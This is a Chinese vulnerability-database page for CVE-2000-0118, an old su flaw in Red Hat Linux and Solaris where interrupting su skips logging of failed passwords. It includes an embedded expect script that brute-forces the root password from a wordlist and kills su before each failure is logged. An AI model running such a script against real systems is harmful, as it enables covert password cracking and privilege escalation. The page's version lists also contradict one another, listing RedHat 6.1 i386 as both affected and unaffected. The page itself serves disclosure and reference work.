CVE-2000-0118
CVSS7.2
发布时间 :1999-06-09 00:00:00
修订时间 :2016-10-17 22:06:30
NMCOES    

[原文]The Red Hat Linux su program does not log failed password guesses if the su process is killed before it times out, which allows local attackers to conduct brute force password guessing.


[CNNVD]RedHat su No记录漏洞(CNNVD-199906-015)

        Red Hat Linux su程序存在漏洞。如果su过程在超时之前被终止,该程序不能记录失败的密码猜测,本地攻击者可以利用该漏洞进行蛮力密码猜测。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:4.2Red Hat Linux 4.2
cpe:/o:redhat:linux:5.1Red Hat Linux 5.1
cpe:/o:redhat:linux:2.0Red Hat Linux 2.0
cpe:/o:redhat:linux:2.1Red Hat Linux 2.1
cpe:/o:sun:solaris:2.4::x86
cpe:/o:redhat:linux:4.0Red Hat Linux 4.0
cpe:/o:sun:solaris:::x86
cpe:/o:redhat:linux:4.1Red Hat Linux 4.1
cpe:/o:redhat:linux:5.0Red Hat Linux 5.0
cpe:/o:redhat:linux:6.0::i386
cpe:/o:sun:solaris:2.5
cpe:/o:redhat:linux:5.2::i386
cpe:/o:redhat:linux:6.1::i386
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.1
cpe:/o:sun:solaris:1.2
cpe:/o:sun:solaris:1.1
cpe:/o:sun:solaris:2.3
cpe:/o:sun:solaris:2.0
cpe:/o:sun:solaris:1.1.1a
cpe:/o:sun:solaris:1.1.3
cpe:/o:sun:solaris:2.2
cpe:/o:sun:solaris:1.1.2
cpe:/o:sun:solaris:1.1.4
cpe:/o:redhat:linux:3.0.3Red Hat Linux 3.0.3
cpe:/o:sun:solaris:1.1.3:u1
cpe:/o:sun:solaris:1.1.4::jl
cpe:/o:redhat:linux:6.0::alpha
cpe:/o:redhat:linux:5.2::alpha
cpe:/o:redhat:linux:6.1::alpha
cpe:/o:redhat:linux:6.0::sparc
cpe:/o:redhat:linux:5.2::sparc
cpe:/o:redhat:linux:6.1::sparc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0118
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0118
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199906-015
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94935300520617&w=2
(UNKNOWN)  BUGTRAQ  20000130 RedHat 6.1 /and others/ PAM

- 漏洞信息

RedHat su No记录漏洞
高危 未知
1999-06-09 00:00:00 2007-05-22 00:00:00
本地  
        Red Hat Linux su程序存在漏洞。如果su过程在超时之前被终止,该程序不能记录失败的密码猜测,本地攻击者可以利用该漏洞进行蛮力密码猜测。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19255)

RedHat Linux 5.2 i386/6.0 No Logging Vulnerability (EDBID:19255)
linux local
1999-06-09 Verified
0 Tani Hosokawa
N/A [点击下载]
source: http://www.securityfocus.com/bid/320/info

A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity.

su is a command that allows users to change identifies by supplying a password. If the password is correct su immediately executes a new shell with the identity of the nw user, otherwise it sleeps for a second and then logs an authentication failure to syslog.

Since su sleeps before logging the failure and does not trap SIGINT a user can try a password and if su does not immediately give him a new shell and before one second hits control-c his attempt will not be logged. He can automate the process to brute force passwords.

Its been tested using sh-utils-1.16-14 and pam-0.64-3.

#!/usr/local/bin/expect --

# A quick little sploit for a quick round of beers :) mudge@L0pht.com

#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember. 
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#    attempt to SU
#          |
#     succesfull
#    /          \
#   Y            N
#   |            |
# exec cmd     sleep
#                |
#             syslog 
#                |
#              exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occured.
#       
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
#     .mudge


if { ($argc < 1) || ($argc > 1) } {
  puts "correct usage is : $argv0 pwfile"
  exit
}

set pwfile [open $argv "r"]

log_user 0
foreach line [split [read $pwfile] "\n"] {
  spawn su root
  expect "Password:"
  send "$line\n"
  # you might need to tweak this but it should be ok
  set timeout 2
  expect {
    "#" { puts "root password is $line\n" ; exit }
  }
  set id [ exp_pid ]
  exec kill -INT $id
}

		

- 漏洞信息

13635
Red Hat Linux su Failed Password Logging Weakness
Local Access Required Other
Loss of Confidentiality Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-01-30 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 6.1 i386 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

RedHat su No Logging Vulnerability
Unknown 320
No Yes
1999-06-09 12:00:00 2009-07-11 12:16:00
This vulnerability was reported to the BUGTRAQ mailing list by Tani Hosokawa <unknown@riverstyx.net>.

- 受影响的程序版本

RedHat Linux 6.0
RedHat Linux 5.2 i386
RedHat Linux 6.1 i386

- 不受影响的程序版本

RedHat Linux 6.1 i386

- 漏洞讨论

A vulnerability in PAM allows local malicious users to brute force passwords via the su command without any logging of their activity.

su is a command that allows users to change identifies by supplying a password. If the password is correct su immediately executes a new shell with the identity of the nw user, otherwise it sleeps for a second and then logs an authentication failure to syslog.

Since su sleeps before logging the failure and does not trap SIGINT a user can try a password and if su does not immediately give him a new shell and before one second hits control-c his attempt will not be logged. He can automate the process to brute force passwords.

Its been tested using sh-utils-1.16-14 and pam-0.64-3.

- 漏洞利用

x

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站